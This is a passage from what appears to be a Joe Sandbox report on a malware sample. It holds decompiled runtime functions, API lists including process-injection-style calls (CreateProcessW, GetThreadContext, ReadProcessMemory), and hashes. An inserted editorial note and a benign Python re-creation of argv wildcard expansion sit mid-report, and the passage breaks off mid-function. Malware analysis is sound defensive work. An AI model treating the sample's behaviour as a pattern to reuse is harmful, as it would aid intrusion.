        • API ID: CreateFileFreeVirtual
        • String ID:
        • API String ID: 204039940-0
        • Opcode ID: 1b514a202ce007281f84b9962a7ae5b6aa93391a19764c4e7429361d82933d36
        • Instruction ID: 242ca8bc9f6f57fee1e207a09d5aaf3d8be905b971b0372d3796b1d4c100a775
        • Opcode Fuzzy Hash: 1b514a202ce007281f84b9962a7ae5b6aa93391a19764c4e7429361d82933d36
        • Instruction Fuzzy Hash: 66A117B4E00309EBDB14CFD8C895BEEBBB5BF48304F108199E641BB284D775AA41CB55
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph (rendered graph omitted)
        APIs
        • CreateProcessW.KERNELBASE(00000001,00000000), ref: 010D1AD2
        • GetThreadContext.KERNELBASE(?,00010007), ref: 010D1AF3
        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010D1B15
        Memory Dump Source
        • Source File: 00000007.00000002.301067751.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_10d0000_ople.jbxd
        Similarity
        • API ID: Process$ContextCreateMemoryReadThread
        • String ID:
        • API String ID: 2411489757-0
        • Opcode ID: 9cf7fa00ef4e5d423118deeadac9358b6660a85b94d1e07586abdd49760e417c
        • Instruction ID: c9c05f63df1b36cc6d8db86c8ef6ecb082d6112438f5efc11ff0664b159850f4
        • Opcode Fuzzy Hash: 9cf7fa00ef4e5d423118deeadac9358b6660a85b94d1e07586abdd49760e417c
        • Instruction Fuzzy Hash: 75022B70A00309EBEB18DFD8C985FEEB7B6FF48704F108158E655AB284DB74A941CB55
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph (rendered graph omitted)
        C-Code - Quality: 94%
        			E00AB5D94() {
        				int _v8;
        				void* __ecx;
        				void* _t6;
        				int _t7;
        				char* _t8;
        				char* _t13;
        				int _t17;
        				void* _t19;
        				char* _t25;
        				WCHAR* _t27;
        
        				_t27 = GetEnvironmentStringsW();
        				if(_t27 == 0) {
        					L7:
        					_t13 = 0;
        				} else {
        					_t6 = E00AB5D5D(_t27);
        					_pop(_t19);
        					_t17 = _t6 - _t27 >> 1;
        					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
        					_v8 = _t7;
        					if(_t7 == 0) {
        						goto L7;
        					} else {
        						_t8 = E00AB46B0(_t19, _t7); // executed
        						_t25 = _t8;
        						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
        							_t13 = 0;
        						} else {
        							_t13 = _t25;
        							_t25 = 0;
        						}
        						E00AB4676(_t25);
        					}
        				}
        				if(_t27 != 0) {
        					FreeEnvironmentStringsW(_t27);
        				}
        				return _t13;
        			}

        APIs
        • GetEnvironmentStringsW.KERNEL32 ref: 00AB5D9D
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AB5DC0
          • Part of subcall function 00AB46B0: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00AB8CDE,?,00000000,?,00AB7370,?,00000004,00000000,?,?,?,00AB437B), ref: 00AB46E2
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00AB5DE6
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AB5E08
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
        • String ID:
        • API String ID: 1794362364-0
        • Opcode ID: 37e1c9ba13b137657fd6ac405a921b2d664aec0aee812ecaec851e0bac0a46fa
        • Instruction ID: e6f9634e3acde5a122f4b88e78a8398e3afc17fc57b969ab31f5f5af8657a3a6
        • Opcode Fuzzy Hash: 37e1c9ba13b137657fd6ac405a921b2d664aec0aee812ecaec851e0bac0a46fa
        • Instruction Fuzzy Hash: 10018872E01A157B672167BA6C8DEBF6E6DDEC6B607140229FD05C6213EA61CE0285F0
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph (rendered graph omitted)
        C-Code - Quality: 84%
        			E00AB6A69() {
        				signed int _t20;
        				signed int _t22;
        				long _t23;
        				signed int _t25;
        				void* _t28;
        				signed int _t31;
        				void* _t33;
        
        				_t31 = 0;
        				do {
        					_t20 = _t31 & 0x0000003f;
        					_t33 = _t20 * 0x30 +  *((intOrPtr*)(0xac3f60 + (_t31 >> 6) * 4));
        					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
        						 *(_t33 + 0x28) = 0x81;
        						_t22 = _t31;
        						if(_t22 == 0) {
        							_push(0xfffffff6);
        						} else {
        							if(_t22 == 1) {
        								_push(0xfffffff5);
        							} else {
        								_push(0xfffffff4);
        							}
        						}
        						_pop(_t23);
        						_t28 = GetStdHandle(_t23);
        						if(_t28 == 0xffffffff || _t28 == 0) {
        							_t25 = 0;
        						} else {
        							_t25 = GetFileType(_t28); // executed
        						}
        						if(_t25 == 0) {
        							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
        							 *(_t33 + 0x18) = 0xfffffffe;
        							_t20 =  *0xac4194;
        							if(_t20 != 0) {
        								_t20 =  *(_t20 + _t31 * 4);
        								 *(_t20 + 0x10) = 0xfffffffe;
        							}
        						} else {
        							_t20 = _t25 & 0x000000ff;
        							 *(_t33 + 0x18) = _t28;
        							if(_t20 != 2) {
        								if(_t20 == 3) {
        									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
        								}
        							} else {
        								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
        							}
        						}
        					} else {
        						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
        					}
        					_t31 = _t31 + 1;
        				} while (_t31 != 3);
        				return _t20;
        			}

        APIs
        • GetStdHandle.KERNEL32(000000F6), ref: 00AB6AB5
        • GetFileType.KERNELBASE(00000000), ref: 00AB6AC7
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: FileHandleType
        • String ID:
        • API String ID: 3000768030-0
        • Opcode ID: 44312b8f7d6f426817b612e65a466f121903b375cd927831d64066db3e1cd5f2
        • Instruction ID: 2d9f21da217e2b1da78f7c5366b9bd58a77ba8cda9c20cd4decd3eddb0382352
        • Opcode Fuzzy Hash: 44312b8f7d6f426817b612e65a466f121903b375cd927831d64066db3e1cd5f2
        • Instruction Fuzzy Hash: 2811DA3120474246DF308F3D8C886A2BABC9B56370B38471ED5B6E61F3D638DD869241
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph (rendered graph omitted)
        C-Code - Quality: 95%
        			E00AB479B(void* __ecx, signed int _a4, signed int _a8) {
        				void* __esi;
        				void* _t8;
        				void* _t12;
        				signed int _t13;
        				void* _t15;
        				signed int _t16;
        				signed int _t18;
        				long _t19;
        
        				_t15 = __ecx;
        				_t18 = _a4;
        				if(_t18 == 0) {
        					L2:
        					_t19 = _t18 * _a8;
        					if(_t19 == 0) {
        						_t19 = _t19 + 1;
        					}
        					while(1) {
        						_t8 = RtlAllocateHeap( *0xac4170, 8, _t19); // executed
        						if(_t8 != 0) {
        							break;
        						}
        						__eflags = E00AB40A1();
        						if(__eflags == 0) {
        							L8:
        							 *((intOrPtr*)(E00AB501F())) = 0xc;
        							__eflags = 0;
        							return 0;
        						}
        						_t12 = E00AB74C4(_t15, _t16, _t19, __eflags, _t19);
        						_pop(_t15);
        						__eflags = _t12;
        						if(_t12 == 0) {
        							goto L8;
        						}
        					}
        					return _t8;
        				}
        				_t13 = 0xffffffe0;
        				_t16 = _t13 % _t18;
        				if(_t13 / _t18 < _a8) {
        					goto L8;
        				}
        				goto L2;
        			}

        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AB4CFF,00000001,00000364,?,00AB7370,?,00000004,00000000,?,?,?,00AB437B), ref: 00AB47DC
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: c6ac69dcef7bd2abe3d1f07c1bcc1c56182fbfc8642fb997c4081ea0d1a361e0
        • Instruction ID: c0bd75d233fb953e74f507119e43a9384eee2be33271e0372f5281f5811b2d9f
        • Opcode Fuzzy Hash: c6ac69dcef7bd2abe3d1f07c1bcc1c56182fbfc8642fb997c4081ea0d1a361e0
        • Instruction Fuzzy Hash: 27F0B431544624AB9B216B629D01BDA3B9CAB4A760F168152A80597593CF20DC92C2E0
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph (rendered graph omitted)
        C-Code - Quality: 94%
        			E00AB46B0(void* __ecx, long _a4) {
        				void* __esi;
        				void* _t4;
        				void* _t6;
        				void* _t7;
        				void* _t8;
        				long _t9;
        
        				_t7 = __ecx;
        				_t9 = _a4;
        				if(_t9 > 0xffffffe0) {
        					L7:
        					 *((intOrPtr*)(E00AB501F())) = 0xc;
        					__eflags = 0;
        					return 0;
        				}
        				if(_t9 == 0) {
        					_t9 = _t9 + 1;
        				}
        				while(1) {
        					_t4 = RtlAllocateHeap( *0xac4170, 0, _t9); // executed
        					if(_t4 != 0) {
        						break;
        					}
        					__eflags = E00AB40A1();
        					if(__eflags == 0) {
        						goto L7;
        					}
        					_t6 = E00AB74C4(_t7, _t8, _t9, __eflags, _t9);
        					_pop(_t7);
        					__eflags = _t6;
        					if(_t6 == 0) {
        						goto L7;
        					}
        				}
        				return _t4;
        			}

        APIs
        • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00AB8CDE,?,00000000,?,00AB7370,?,00000004,00000000,?,?,?,00AB437B), ref: 00AB46E2
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 57b5c00c2262e2eaf88ce6e693d368af67ee2ae930881987326fca2d58d79e3a
        • Instruction ID: e9d0d8ddc88622a8429906e93988934bc34f6f616d43fe4381af3d796f4c10fd
        • Opcode Fuzzy Hash: 57b5c00c2262e2eaf88ce6e693d368af67ee2ae930881987326fca2d58d79e3a
        • Instruction Fuzzy Hash: 72E0ED35144624ABE6203B759E20BDA3BAC9B4B7A0F090221BC46D65D3EF20CC4182E4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 76%
        			E00AB4D99(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
        				char _v0;
        				signed int _v8;
        				intOrPtr _v524;
        				intOrPtr _v528;
        				void* _v532;
        				intOrPtr _v536;
        				char _v540;
        				intOrPtr _v544;
        				intOrPtr _v548;
        				intOrPtr _v552;
        				intOrPtr _v556;
        				intOrPtr _v560;
        				intOrPtr _v564;
        				intOrPtr _v568;
        				intOrPtr _v572;
        				intOrPtr _v576;
        				intOrPtr _v580;
        				intOrPtr _v584;
        				char _v724;
        				intOrPtr _v792;
        				intOrPtr _v800;
        				char _v804;
        				struct _EXCEPTION_POINTERS _v812;
        				signed int _t40;
        				char* _t47;
        				char* _t49;
        				intOrPtr _t61;
        				intOrPtr _t62;
        				intOrPtr _t66;
        				intOrPtr _t67;
        				int _t68;
        				intOrPtr _t69;
        				signed int _t70;
        
        				_t69 = __esi;
        				_t67 = __edi;
        				_t66 = __edx;
        				_t61 = __ebx;
        				_t40 =  *0xac3018; // 0x4c695d09
        				_t41 = _t40 ^ _t70;
        				_v8 = _t40 ^ _t70;
        				if(_a4 != 0xffffffff) {
        					_push(_a4);
        					E00AB2747(_t41);
        					_pop(_t62);
        				}
        				E00AB2CE0(_t67,  &_v804, 0, 0x50);
        				E00AB2CE0(_t67,  &_v724, 0, 0x2cc);
        				_v812.ExceptionRecord =  &_v804;
        				_t47 =  &_v724;
        				_v812.ContextRecord = _t47;
        				_v548 = _t47;
        				_v552 = _t62;
        				_v556 = _t66;
        				_v560 = _t61;
        				_v564 = _t69;
        				_v568 = _t67;
        				_v524 = ss;
        				_v536 = cs;
        				_v572 = ds;
        				_v576 = es;
        				_v580 = fs;
        				_v584 = gs;
        				asm("pushfd");
        				_pop( *_t22);
        				_v540 = _v0;
        				_t49 =  &_v0;
        				_v528 = _t49;
        				_v724 = 0x10001;
        				_v544 =  *((intOrPtr*)(_t49 - 4));
        				_v804 = _a8;
        				_v800 = _a12;
        				_v792 = _v0;
        				_t68 = IsDebuggerPresent();
        				SetUnhandledExceptionFilter(0);
        				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
        					_push(_a4);
        					E00AB2747(_t57);
        				}
        				return E00AB29BB(_v8 ^ _t70);
        			}

        APIs
        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AB4E91
        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AB4E9B
        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AB4EA8
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$DebuggerPresent
        • String ID: ]iL
        • API String ID: 3906539128-4085116960
        • Opcode ID: ce8ae586833aba35fd4efbf588e3aaea851044772a6bcb1afccd8e1900290b43
        • Instruction ID: 7d507d22a7d2f986a604c781b14a6c06d1afc15c465a5be547dbdf2601595461
        • Opcode Fuzzy Hash: ce8ae586833aba35fd4efbf588e3aaea851044772a6bcb1afccd8e1900290b43
        • Instruction Fuzzy Hash: 973195759012289BCB61DF64DD897DDBBB8BF08310F5042DAE41CA7262E7749B858F44
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 72%
        			E00AB51DA(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
        				intOrPtr _v8;
        				signed int _v12;
        				intOrPtr* _v32;
        				CHAR* _v36;
        				signed int _v48;
        				char _v286;
        				signed int _v287;
        				struct _WIN32_FIND_DATAA _v332;
        				intOrPtr* _v336;
        				signed int _v340;
        				signed int _v344;
        				intOrPtr _v372;
        				signed int _t35;
        				signed int _t40;
        				signed int _t43;
        				intOrPtr _t45;
        				signed char _t47;
        				intOrPtr* _t55;
        				union _FINDEX_INFO_LEVELS _t57;
        				signed int _t62;
        				signed int _t65;
        				void* _t72;
        				void* _t74;
        				signed int _t75;
        				void* _t78;
        				CHAR* _t79;
        				intOrPtr* _t83;
        				intOrPtr _t85;
        				void* _t87;
        				intOrPtr* _t88;
        				signed int _t92;
        				signed int _t96;
        				void* _t101;
        				intOrPtr _t102;
        				signed int _t105;
        				union _FINDEX_INFO_LEVELS _t106;
        				void* _t111;
        				intOrPtr _t112;
        				void* _t113;
        				signed int _t118;
        				void* _t119;
        				signed int _t120;
        				void* _t121;
        				void* _t122;
        
        				_push(__ecx);
        				_t83 = _a4;
        				_t2 = _t83 + 1; // 0x1
        				_t101 = _t2;
        				do {
        					_t35 =  *_t83;
        					_t83 = _t83 + 1;
        				} while (_t35 != 0);
        				_push(__edi);
        				_t105 = _a12;
        				_t85 = _t83 - _t101 + 1;
        				_v8 = _t85;
        				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
        					_push(__ebx);
        					_push(__esi);
        					_t5 = _t105 + 1; // 0x1
        					_t78 = _t5 + _t85;
        					_t111 = E00AB479B(_t85, _t78, 1);
        					_pop(_t87);
        					__eflags = _t105;
        					if(_t105 == 0) {
        						L6:
        						_push(_v8);
        						_t78 = _t78 - _t105;
        						_t40 = E00AB874B(_t87, _t111 + _t105, _t78, _a4);
        						_t120 = _t119 + 0x10;
        						__eflags = _t40;
        						if(__eflags != 0) {
        							goto L9;
        						} else {
        							_t72 = E00AB5419(_a16, _t101, __eflags, _t111);
        							E00AB4676(0);
        							_t74 = _t72;
        							goto L8;
        						}
        					} else {
        						_push(_t105);
        						_t75 = E00AB874B(_t87, _t111, _t78, _a8);
        						_t120 = _t119 + 0x10;
        						__eflags = _t75;
        						if(_t75 != 0) {
        							L9:
        							_push(0);
        							_push(0);
        							_push(0);
        							_push(0);
        							_push(0);
        							E00AB4F73();
        							asm("int3");
        							_t118 = _t120;
        							_t121 = _t120 - 0x150;
        							_t43 =  *0xac3018; // 0x4c695d09
        							_v48 = _t43 ^ _t118;
        							_t88 = _v32;
        							_push(_t78);
        							_t79 = _v36;
        							_push(_t111);
        							_t112 = _v332.cAlternateFileName;
        							_push(_t105);
        							_v372 = _t112;
        							while(1) {
        								__eflags = _t88 - _t79;
        								if(_t88 == _t79) {
        									break;
        								}
        								_t45 =  *_t88;
        								__eflags = _t45 - 0x2f;
        								if(_t45 != 0x2f) {
        									__eflags = _t45 - 0x5c;
        									if(_t45 != 0x5c) {
        										__eflags = _t45 - 0x3a;
        										if(_t45 != 0x3a) {
        											_t88 = E00AB87A0(_t79, _t88);
        											continue;
        										}
        									}
        								}
        								break;
        							}
        							_t102 =  *_t88;
        							__eflags = _t102 - 0x3a;
        							if(_t102 != 0x3a) {
        								L19:
        								_t106 = 0;
        								__eflags = _t102 - 0x2f;
        								if(_t102 == 0x2f) {
        									L23:
        									_t47 = 1;
        									__eflags = 1;
        								} else {
        									__eflags = _t102 - 0x5c;
        									if(_t102 == 0x5c) {
        										goto L23;
        									} else {
        										__eflags = _t102 - 0x3a;
        										if(_t102 == 0x3a) {
        											goto L23;
        										} else {
        											_t47 = 0;
        										}
        									}
        								}
        								_t90 = _t88 - _t79 + 1;
        								asm("sbb eax, eax");
        								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
        								E00AB2CE0(_t106,  &_v332, _t106, 0x140);
        								_t122 = _t121 + 0xc;
        								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
        								_t55 = _v336;
        								__eflags = _t113 - 0xffffffff;
        								if(_t113 != 0xffffffff) {
        									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
        									__eflags = _t92;
        									_t93 = _t92 >> 2;
        									_v344 = _t92 >> 2;
        									do {
        										__eflags = _v332.cFileName - 0x2e;
        										if(_v332.cFileName != 0x2e) {
        											L36:
        											_push(_t55);
        											_t57 = E00AB51DA(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
        											_t122 = _t122 + 0x10;
        											__eflags = _t57;
        											if(_t57 != 0) {
        												goto L26;
        											} else {
        												goto L37;
        											}
        										} else {
        											_t93 = _v287;
        											__eflags = _t93;
        											if(_t93 == 0) {
        												goto L37;
        											} else {
        												__eflags = _t93 - 0x2e;
        												if(_t93 != 0x2e) {
        													goto L36;
        												} else {
        													__eflags = _v286;
        													if(_v286 == 0) {
        														goto L37;
        													} else {
        														goto L36;
        													}
        												}
        											}
        										}
        										goto L40;
        										L37:
        										_t62 = FindNextFileA(_t113,  &_v332);
        										__eflags = _t62;
        										_t55 = _v336;
        									} while (_t62 != 0);
        									_t103 =  *_t55;
        									_t96 = _v344;
        									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
        									__eflags = _t96 - _t65;
        									if(_t96 != _t65) {
        										E00AB8300(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E00AB5032);
        									}
        								} else {
        									_push(_t55);
        									_t57 = E00AB51DA(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
        									L26:
        									_t106 = _t57;
        								}
        								__eflags = _t113 - 0xffffffff;
        								if(_t113 != 0xffffffff) {
        									FindClose(_t113);
        								}
        							} else {
        								__eflags = _t88 -  &(_t79[1]);
        								if(_t88 ==  &(_t79[1])) {
        									goto L19;
        								} else {
        									_push(_t112);
        									E00AB51DA(_t79, _t88, 0, _t112, _t79, 0, 0);
        								}
        							}
        							__eflags = _v12 ^ _t118;
        							return E00AB29BB(_v12 ^ _t118);
        						} else {
        							goto L6;
        						}
        					}
        				} else {
        					_t74 = 0xc;
        					L8:
        					return _t74;
        				}
        				L40:
        			}
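The listing above is two routines printed as one. The decompiler ran through the asm("int3") that follows the call to E00AB4F73 (five zero arguments pushed, no return path) and continued into a fresh stack frame, with its own cookie load from *0xac3018, belonging to the code at 0x00ab5263. The first routine takes a file name, a directory prefix, the prefix length and a vector, builds "prefix + name" (calloc, then the two E00AB874B copies), pushes it with E00AB5419 and returns 0, or 0xc when the length check fails. The second walks backwards from the end of an argument to the last '/', '\\' or ':' (the 0x2f, 0x5c, 0x3a tests), treats a colon that is not at index 1 as a reason to add the argument verbatim, enumerates matches with FindFirstFileExA/FindNextFileA, skips entries named "." and ".." (the cFileName[0..2] tests), calls the first routine for every other hit, and qsorts (E00AB8300) only the entries it added before FindClose. That is the shape of the MSVC CRT's argv wildcard expansion; the identification is the editor's reading of the listing, not a label the report assigns, and nothing in either routine is specific to this sample. The Python below is an added example, not code from the sample or from Joe Sandbox, that re-implements that control flow. FAKE_FS and fake_find are constructed stand-ins for the Win32 enumeration so it runs offline, and plain string order is assumed for the sort because the comparator E00AB5032 is not shown on the page.

```python
"""Added example: Python rendering of the two routines in the E00AB51DA listing
(copy-and-add an argument; expand a wildcard argument).  FAKE_FS and fake_find are
constructed stand-ins for FindFirstFileExA/FindNextFileA; nothing here is sample code."""
import fnmatch

SEPARATORS = "/\\:"   # the three bytes the backward scan stops on: '/', '\\', ':'
ENOMEM = 0xC          # value returned when the length check in the first routine fails

# Constructed directory listing.  Windows enumeration yields "." and ".." as real
# entries, which is why the decompiled loop has to test for them explicitly.
FAKE_FS = {
    "C:\\Users\\victim\\Documents\\": [".", "..", "notes.txt", "Budget.xlsx",
                                       "invoice.pdf", "b.txt"],
}


def split_last_separator(arg):
    """Walk backwards from the end of the argument to the last separator, as the
    loop before the 0x3a test does.  Returns its index, or -1 if there is none."""
    i = len(arg) - 1
    while i > 0 and arg[i] not in SEPARATORS:
        i -= 1
    # The loop also stops at index 0; the listing then re-tests the byte there.
    return i if i >= 0 and arg[i] in SEPARATORS else -1


def fake_find(pattern):
    """Stand-in for FindFirstFileExA/FindNextFileA: names in the pattern's directory
    whose name matches the last component, case-insensitively (a simplification of
    Win32 matching).  None plays the role of INVALID_HANDLE_VALUE."""
    i = split_last_separator(pattern)
    directory, tail = pattern[: i + 1], pattern[i + 1:]
    entries = FAKE_FS.get(directory)
    if entries is None:
        return None
    hits = [n for n in entries if fnmatch.fnmatchcase(n.lower(), tail.lower())]
    return hits or None


def copy_and_add_argument(file_name, directory, dir_len, argv):
    """First routine: length check, then dir_len bytes of directory followed by the
    file name (calloc + strcpy_s in the listing), pushed onto the argument vector."""
    name_len = len(file_name) + 1                 # strlen plus terminator
    if name_len > 0xFFFFFFFF - dir_len:           # the `<= 0xffffffff - dir_len` guard
        return ENOMEM
    argv.append(directory[:dir_len] + file_name)
    return 0


def expand_argument_wildcards(arg, argv, find=fake_find):
    """Second routine (the code after the int3)."""
    i = split_last_separator(arg)
    if i >= 0 and arg[i] == ":" and i != 1:
        # A colon that is not the drive colon of "C:": add the argument unchanged.
        return copy_and_add_argument(arg, "", 0, argv)
    dir_len = i + 1                               # prefix through the separator, or 0
    matches = find(arg)
    if matches is None:                           # enumeration failed: keep the literal
        return copy_and_add_argument(arg, "", 0, argv)
    first_new = len(argv)
    for name in matches:
        if name in (".", ".."):                   # the cFileName[0], [1], [2] tests
            continue
        rc = copy_and_add_argument(name, arg, dir_len, argv)
        if rc != 0:
            return rc
    if len(argv) != first_new:
        # qsort over only the entries added above (E00AB8300 with E00AB5032, whose
        # ordering is not shown; plain string order is assumed here).
        argv[first_new:] = sorted(argv[first_new:])
    return 0
```

Running expand_argument_wildcards("C:\\Users\\victim\\Documents\\*.txt", []) against FAKE_FS yields the two .txt entries with the directory prefix, in sorted order; a pattern with no match, or a name carrying a non-drive colon such as "report.txt:hidden", is passed through untouched, which is exactly why a wildcard argument that matches nothing still reaches main() as a literal string.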
        Instruction address column for the E00AB51DA listing (one address per C line in the original layout, extracted here out of alignment): addresses span 0x00ab51df to 0x00ab53ec; 0x00000000 entries are lines the decompiler did not map to an instruction.

        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmp
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID:
        • String ID: ]iL$.
        • API String ID: 0-1155455829
        • Opcode ID: 827799c2969346a33addeb5b3585b0a649b565dec7c4c3602534e6a12f8e8db3
        • Instruction ID: a7e33e062fd99d81d8f018dbcc7c50d3b7802bd478d50eb9b32a6a64386cad3d
        • Opcode Fuzzy Hash: 827799c2969346a33addeb5b3585b0a649b565dec7c4c3602534e6a12f8e8db3
        • Instruction Fuzzy Hash: C131E471D00609AFCB249F79DC89FFA7BBDEB85314F1402A8F81997252E6319E458B50
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E00AB928E(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
        				signed int _v8;
        				char _v22;
        				struct _cpinfo _v28;
        				short* _v32;
        				int _v36;
        				char* _v40;
        				int _v44;
        				intOrPtr _v48;
        				void* _v60;
        				signed int _t63;
        				int _t70;
        				signed int _t72;
        				short* _t73;
        				signed int _t77;
        				short* _t87;
        				void* _t89;
        				void* _t92;
        				int _t99;
        				intOrPtr _t101;
        				intOrPtr _t102;
        				signed int _t112;
        				char* _t114;
        				char* _t115;
        				void* _t120;
        				void* _t121;
        				intOrPtr _t122;
        				intOrPtr _t123;
        				intOrPtr* _t125;
        				short* _t126;
        				int _t128;
        				int _t129;
        				short* _t130;
        				intOrPtr* _t131;
        				signed int _t132;
        				short* _t133;
        
        				_t63 =  *0xac3018; // 0x4c695d09
        				_v8 = _t63 ^ _t132;
        				_t128 = _a20;
        				_v44 = _a4;
        				_v48 = _a8;
        				_t67 = _a24;
        				_v40 = _a24;
        				_t125 = _a16;
        				_v36 = _t125;
        				if(_t128 <= 0) {
        					if(_t128 >= 0xffffffff) {
        						goto L2;
        					} else {
        						goto L5;
        					}
        				} else {
        					_t128 = E00AB914F(_t125, _t128);
        					_t67 = _v40;
        					L2:
        					_t99 = _a28;
        					if(_t99 <= 0) {
        						if(_t99 < 0xffffffff) {
        							goto L5;
        						} else {
        							goto L7;
        						}
